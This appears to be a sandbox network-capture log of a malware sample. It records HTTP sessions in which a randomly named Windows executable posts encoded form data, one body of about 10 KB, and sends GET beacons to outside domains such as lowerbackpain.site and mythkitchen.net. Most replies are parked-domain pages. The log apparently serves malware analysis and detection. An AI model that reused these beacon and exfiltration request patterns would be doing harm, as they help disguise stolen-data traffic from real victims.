66 67 74 30 6c 6c 4c 42 74 75 7a 72 36 77 6e 4f 4d 56 46 7a 4c 6b 75 68 6b 56 57 32 46 4b 35 2b 62 42 63 75 63 2f 37 74 64 48 35 73 76 44 70 41 32 70 69 32 75 53 32 32 2f 55 31 31 62 71 58 43 6b 41 61 46 42 50 4b 31 69 31 64 6e 74 6c 36 4a 6f 38 54 5a 35 43 64 75 44 49 76 6b 30 53 67 3d 3d Data Ascii: fZah6=q2+/PRNSmriyW3QEdb/akDqb3hvwT//6RaEWgAvof60hrXRfHNhDp22Jbp6t5Xfy+y0gj034GSui9WUjhgJLl539laYfiwR9xXcfgt0llLBtuzr6wnOMVFzLkuhkVW2FK5+bBcuc/7tdH5svDpA2pi2uS22/U11bqXCkAaFBPK1i1dntl6Jo8TZ5CduDIvk0Sg==
Nov 11, 2024 06:52:08.098769903 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 05:52:07 GMT content-type: text/html; charset=utf-8 content-length: 1138 x-request-id: 9400ce84-ec25-4f39-9b3e-ebd219eb8360 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cVUEnua1Xh7u70dsMgC50asbROVZB1O29sbUHMA66t5XPFXqHcabIimLmzy2EFFoBH7YtT2ONPAUOjYrYsS81g== set-cookie: parking_session=9400ce84-ec25-4f39-9b3e-ebd219eb8360; expires=Mon, 11 Nov 2024 06:07:08 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 56 55 45 6e 75 61 31 58 68 37 75 37 30 64 73 4d 67 43 35 30 61 73 62 52 4f 56 5a 42 31 4f 32 39 73 62 55 48 4d 41 36 36 74 35 58 50 46 58 71 48 63 61 62 49 69 6d 4c 6d 7a 79 32 45 46 46 6f 42 48 37 59 74 54 32 4f 4e 50 41 55 4f 6a 59 72 59 73 53 38 31 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cVUEnua1Xh7u70dsMgC50asbROVZB1O29sbUHMA66t5XPFXqHcabIimLmzy2EFFoBH7YtT2ONPAUOjYrYsS81g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 11, 2024 06:52:08.098788023 CET	591	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTQwMGNlODQtZWMyNS00ZjM5LTliM2UtZWJkMjE5ZWI4MzYwIiwicGFnZV90aW1lIjoxNzMxMzA0Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50035	199.59.243.227	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:10.224021912 CET	813	OUT	POST /t9om/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.lowerbackpain.site Origin: http://www.lowerbackpain.site Referer: http://www.lowerbackpain.site/t9om/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 71 32 2b 2f 50 52 4e 53 6d 72 69 79 58 55 59 45 4f 71 2f 61 73 44 71 55 37 42 76 77 64 66 2f 2b 52 61 34 57 67 46 66 34 66 49 67 68 71 32 68 66 47 50 5a 44 6c 57 32 4a 51 4a 36 53 68 33 66 35 2b 79 6f 6f 6a 31 4c 34 47 53 4b 69 39 55 38 6a 68 57 42 49 6b 70 33 2f 77 71 59 64 74 51 52 39 78 58 63 66 67 73 52 4f 6c 4c 35 74 75 6a 62 36 78 47 4f 4e 63 6c 7a 4d 79 65 68 6b 52 57 32 42 4b 35 2b 35 42 59 6d 32 2f 35 6c 64 48 34 63 76 45 38 73 35 67 69 32 6b 57 32 32 72 58 31 45 33 75 48 7a 61 42 6f 4a 31 48 70 70 7a 35 37 71 33 30 4c 6f 2f 75 54 39 4b 66 61 6e 33 46 73 5a 39 4a 68 41 34 4a 6e 65 6d 35 47 55 66 67 38 4a 76 59 65 6c 49 6b 6d 6f 3d Data Ascii: fZah6=q2+/PRNSmriyXUYEOq/asDqU7Bvwdf/+Ra4WgFf4fIghq2hfGPZDlW2JQJ6Sh3f5+yooj1L4GSKi9U8jhWBIkp3/wqYdtQR9xXcfgsROlL5tujb6xGONclzMyehkRW2BK5+5BYm2/5ldH4cvE8s5gi2kW22rX1E3uHzaBoJ1Hppz57q30Lo/uT9Kfan3FsZ9JhA4Jnem5GUfg8JvYelIkmo=
Nov 11, 2024 06:52:10.642895937 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 05:52:10 GMT content-type: text/html; charset=utf-8 content-length: 1138 x-request-id: 768deff2-9cc3-4f62-bc7e-904bc6293afc cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cVUEnua1Xh7u70dsMgC50asbROVZB1O29sbUHMA66t5XPFXqHcabIimLmzy2EFFoBH7YtT2ONPAUOjYrYsS81g== set-cookie: parking_session=768deff2-9cc3-4f62-bc7e-904bc6293afc; expires=Mon, 11 Nov 2024 06:07:10 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 56 55 45 6e 75 61 31 58 68 37 75 37 30 64 73 4d 67 43 35 30 61 73 62 52 4f 56 5a 42 31 4f 32 39 73 62 55 48 4d 41 36 36 74 35 58 50 46 58 71 48 63 61 62 49 69 6d 4c 6d 7a 79 32 45 46 46 6f 42 48 37 59 74 54 32 4f 4e 50 41 55 4f 6a 59 72 59 73 53 38 31 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cVUEnua1Xh7u70dsMgC50asbROVZB1O29sbUHMA66t5XPFXqHcabIimLmzy2EFFoBH7YtT2ONPAUOjYrYsS81g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 11, 2024 06:52:10.642955065 CET	591	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzY4ZGVmZjItOWNjMy00ZjYyLWJjN2UtOTA0YmM2MjkzYWZjIiwicGFnZV90aW1lIjoxNzMxMzA0Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50036	199.59.243.227	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:12.814795017 CET	10895	OUT	POST /t9om/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.lowerbackpain.site Origin: http://www.lowerbackpain.site Referer: http://www.lowerbackpain.site/t9om/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 71 32 2b 2f 50 52 4e 53 6d 72 69 79 58 55 59 45 4f 71 2f 61 73 44 71 55 37 42 76 77 64 66 2f 2b 52 61 34 57 67 46 66 34 66 4a 59 68 71 41 31 66 48 75 5a 44 6d 57 32 4a 64 70 36 70 68 33 66 67 2b 79 77 57 6a 31 47 48 47 55 4f 69 39 33 45 6a 6e 6a 68 49 75 70 33 2f 76 36 59 65 69 77 51 67 78 58 4d 62 67 74 68 4f 6c 4c 35 74 75 67 44 36 78 58 4f 4e 61 6c 7a 4c 6b 75 68 34 56 57 32 39 4b 35 6d 44 42 59 69 4d 34 49 46 64 43 6f 4d 76 43 4b 59 35 72 69 32 69 62 57 33 73 58 31 49 6f 75 48 65 72 42 70 38 67 48 75 42 7a 35 39 7a 57 75 72 6b 4a 34 7a 70 73 45 49 50 56 4e 66 39 49 50 69 4d 38 42 55 43 55 35 47 42 38 74 63 4d 2f 42 50 4a 44 79 42 6b 5a 54 79 78 6b 59 43 43 54 35 57 45 42 32 78 68 65 41 74 54 6c 63 5a 70 6f 35 72 58 51 55 73 71 37 74 74 77 77 72 43 4d 70 67 63 57 34 77 74 30 67 51 78 39 52 76 58 36 6a 50 41 4e 36 6f 66 43 76 47 63 48 45 33 4d 71 72 37 6f 7a 58 2f 38 59 78 42 57 52 33 79 7a 65 32 77 33 6c 47 63 79 75 2f 45 77 46 31 58 45 54 2f 36 30 38 63 78 49 52 41 38 31 58 2b [TRUNCATED] Data Ascii: fZah6=q2+/PRNSmriyXUYEOq/asDqU7Bvwdf/+Ra4WgFf4fJYhqA1fHuZDmW2Jdp6ph3fg+ywWj1GHGUOi93EjnjhIup3/v6YeiwQgxXMbgthOlL5tugD6xXONalzLkuh4VW29K5mDBYiM4IFdCoMvCKY5ri2ibW3sX1IouHerBp8gHuBz59zWurkJ4zpsEIPVNf9IPiM8BUCU5GB8tcM/BPJDyBkZTyxkYCCT5WEB2xheAtTlcZpo5rXQUsq7ttwwrCMpgcW4wt0gQx9RvX6jPAN6ofCvGcHE3Mqr7ozX/8YxBWR3yze2w3lGcyu/EwF1XET/608cxIRA81X+AcZJdBczaISQotx64pEtY358uRwPphAbLl/N0NQrw92sN8aVTyCKged1qtug2lS/XvKaubsGvMGYt3bw4N3I50kSq6HCbP4/v0VyhemI6syuFhREIfQ2VRSn+Kum8f7wvr7IURQ6nMypn+WyfIGIpFyROxYVue8S0hS2KqZ3PDcJ3ZEB/ThCC/QnicasuAZgobjBTpS5H9jqiNXI8T06u4flw7ubZ/YZLISIlj2nEOrfeYtoyhieGb0bQw+xCqCnoruVNpiLbR7Pcu8RoQjsAPH4noO/MJvHZVG86YQVy1No7o4a6DYCUVyCSAUR0rsAMF69fcRb8jU88g+KugwUhhnVmzEJfjzPh1F+4ZN5/fxazGL5GrgMV21C4wJ0CmuR++B8YVacFxJiB0L2HtrSZbKhnt1CknKH2ZueweU2SEroPbUAGf9iMz1ZQ9NAercqDSi+6m9kvW721jk7Dzagbk1d8/QhrcGOaVVAPQf0eUeUmfS1yFLhQCrMt5oq0GVj3cxqlmVn3koi5lyI/FDYy9s8SWXretpk1yk9xukZ24veSirFTr+noJgUmctxMlp9cbiwBkxd7l48tIQDPAUtfWoTJej4J3slDY00TMHLVEHFXM4xwojjWac4SE9hm4qAucdVj1rtn1yIXTIyrkT077uPjdufxGPa7P [TRUNCATED]
Nov 11, 2024 06:52:13.228718996 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 05:52:12 GMT content-type: text/html; charset=utf-8 content-length: 1138 x-request-id: 50e22e03-48aa-45f2-93fd-f8e98fb98bfc cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cVUEnua1Xh7u70dsMgC50asbROVZB1O29sbUHMA66t5XPFXqHcabIimLmzy2EFFoBH7YtT2ONPAUOjYrYsS81g== set-cookie: parking_session=50e22e03-48aa-45f2-93fd-f8e98fb98bfc; expires=Mon, 11 Nov 2024 06:07:13 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 56 55 45 6e 75 61 31 58 68 37 75 37 30 64 73 4d 67 43 35 30 61 73 62 52 4f 56 5a 42 31 4f 32 39 73 62 55 48 4d 41 36 36 74 35 58 50 46 58 71 48 63 61 62 49 69 6d 4c 6d 7a 79 32 45 46 46 6f 42 48 37 59 74 54 32 4f 4e 50 41 55 4f 6a 59 72 59 73 53 38 31 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cVUEnua1Xh7u70dsMgC50asbROVZB1O29sbUHMA66t5XPFXqHcabIimLmzy2EFFoBH7YtT2ONPAUOjYrYsS81g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 11, 2024 06:52:13.228737116 CET	591	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTBlMjJlMDMtNDhhYS00NWYyLTkzZmQtZjhlOThmYjk4YmZjIiwicGFnZV90aW1lIjoxNzMxMzA0Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50037	199.59.243.227	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:15.348037004 CET	527	OUT	GET /t9om/?fZah6=n0WfMl5CnLPcYEIDSbX8vA256gGCe+H9L+kKo2v7Vr4MgHUbO89S9QyuVriZ/m6E+Bwct3PaGgmX9ENC/wR4gZ3UutUQij8B41Y6ve4/n9x34EbJwWPEaRw=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.lowerbackpain.site User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:52:15.765153885 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 05:52:15 GMT content-type: text/html; charset=utf-8 content-length: 1498 x-request-id: c69e187c-f49f-4ca2-9084-53cd56d0a662 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zhBx0HDtde2zPsYGyMs4KfGtFvxxkv8sySbbf9S+46Vb2fnggb0cYEQpP4IAE/Ry//8hqKSBevWAOOgfhuX2rQ== set-cookie: parking_session=c69e187c-f49f-4ca2-9084-53cd56d0a662; expires=Mon, 11 Nov 2024 06:07:15 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 68 42 78 30 48 44 74 64 65 32 7a 50 73 59 47 79 4d 73 34 4b 66 47 74 46 76 78 78 6b 76 38 73 79 53 62 62 66 39 53 2b 34 36 56 62 32 66 6e 67 67 62 30 63 59 45 51 70 50 34 49 41 45 2f 52 79 2f 2f 38 68 71 4b 53 42 65 76 57 41 4f 4f 67 66 68 75 58 32 72 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zhBx0HDtde2zPsYGyMs4KfGtFvxxkv8sySbbf9S+46Vb2fnggb0cYEQpP4IAE/Ry//8hqKSBevWAOOgfhuX2rQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 11, 2024 06:52:15.765183926 CET	951	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzY5ZTE4N2MtZjQ5Zi00Y2EyLTkwODQtNTNjZDU2ZDBhNjYyIiwicGFnZV90aW1lIjoxNzMxMzA0Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50038	3.33.130.190	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:20.823921919 CET	784	OUT	POST /jpec/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.mythkitchen.net Origin: http://www.mythkitchen.net Referer: http://www.mythkitchen.net/jpec/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 4b 39 53 6b 62 61 66 45 6f 62 49 36 4f 41 32 53 4c 48 31 77 76 5a 6c 53 74 43 57 64 71 2b 4d 38 36 35 4b 58 61 71 58 57 6d 2b 59 63 57 37 6a 39 4b 52 48 64 71 66 6f 53 73 63 6b 47 47 77 6e 5a 76 6c 4d 2f 39 57 41 7a 30 66 68 6a 57 2f 59 6c 46 6f 44 56 41 4f 75 64 65 57 6d 4b 56 2b 79 77 67 31 57 49 2f 33 31 55 47 76 66 74 6a 36 70 66 50 69 6d 38 6b 7a 62 59 30 4a 36 4b 32 59 4a 5a 63 30 4f 51 79 47 59 65 6a 39 64 67 53 49 6d 55 66 35 56 64 51 46 79 64 6e 66 38 52 4e 4e 4a 4a 71 59 44 6f 4c 31 49 35 43 75 4e 2f 46 72 66 74 6e 5a 43 4c 39 6a 63 71 33 77 6f 6a 38 75 50 6f 49 77 3d 3d Data Ascii: fZah6=K9SkbafEobI6OA2SLH1wvZlStCWdq+M865KXaqXWm+YcW7j9KRHdqfoSsckGGwnZvlM/9WAz0fhjW/YlFoDVAOudeWmKV+ywg1WI/31UGvftj6pfPim8kzbY0J6K2YJZc0OQyGYej9dgSImUf5VdQFydnf8RNNJJqYDoL1I5CuN/FrftnZCL9jcq3woj8uPoIw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50039	3.33.130.190	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:23.512710094 CET	804	OUT	POST /jpec/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.mythkitchen.net Origin: http://www.mythkitchen.net Referer: http://www.mythkitchen.net/jpec/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 4b 39 53 6b 62 61 66 45 6f 62 49 36 4f 6a 75 53 4d 6d 31 77 6b 5a 6c 56 69 69 57 64 67 65 4d 34 36 35 47 58 61 72 69 4e 6e 49 77 63 50 66 6e 39 4c 54 2f 64 6d 2f 6f 53 6e 38 6b 66 43 77 6e 65 76 6c 41 64 39 58 38 7a 30 66 31 6a 57 39 41 6c 5a 49 2f 57 41 65 75 66 53 32 6d 49 62 65 79 77 67 31 57 49 2f 7a 63 37 47 76 58 74 69 4b 5a 66 4a 41 50 4f 37 44 62 66 35 5a 36 4b 79 59 4a 56 63 30 4f 49 79 44 41 30 6a 34 5a 67 53 4b 75 55 59 72 39 53 65 46 79 62 71 2f 39 2f 46 74 70 4e 6c 61 2b 6b 45 32 63 5a 43 2f 39 41 41 74 53 33 32 6f 6a 63 76 6a 34 5a 71 33 68 58 78 74 79 68 54 77 78 4e 38 71 75 71 42 54 74 50 5a 70 49 6a 47 55 39 2b 4a 65 55 3d Data Ascii: fZah6=K9SkbafEobI6OjuSMm1wkZlViiWdgeM465GXariNnIwcPfn9LT/dm/oSn8kfCwnevlAd9X8z0f1jW9AlZI/WAeufS2mIbeywg1WI/zc7GvXtiKZfJAPO7Dbf5Z6KyYJVc0OIyDA0j4ZgSKuUYr9SeFybq/9/FtpNla+kE2cZC/9AAtS32ojcvj4Zq3hXxtyhTwxN8quqBTtPZpIjGU9+JeU=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
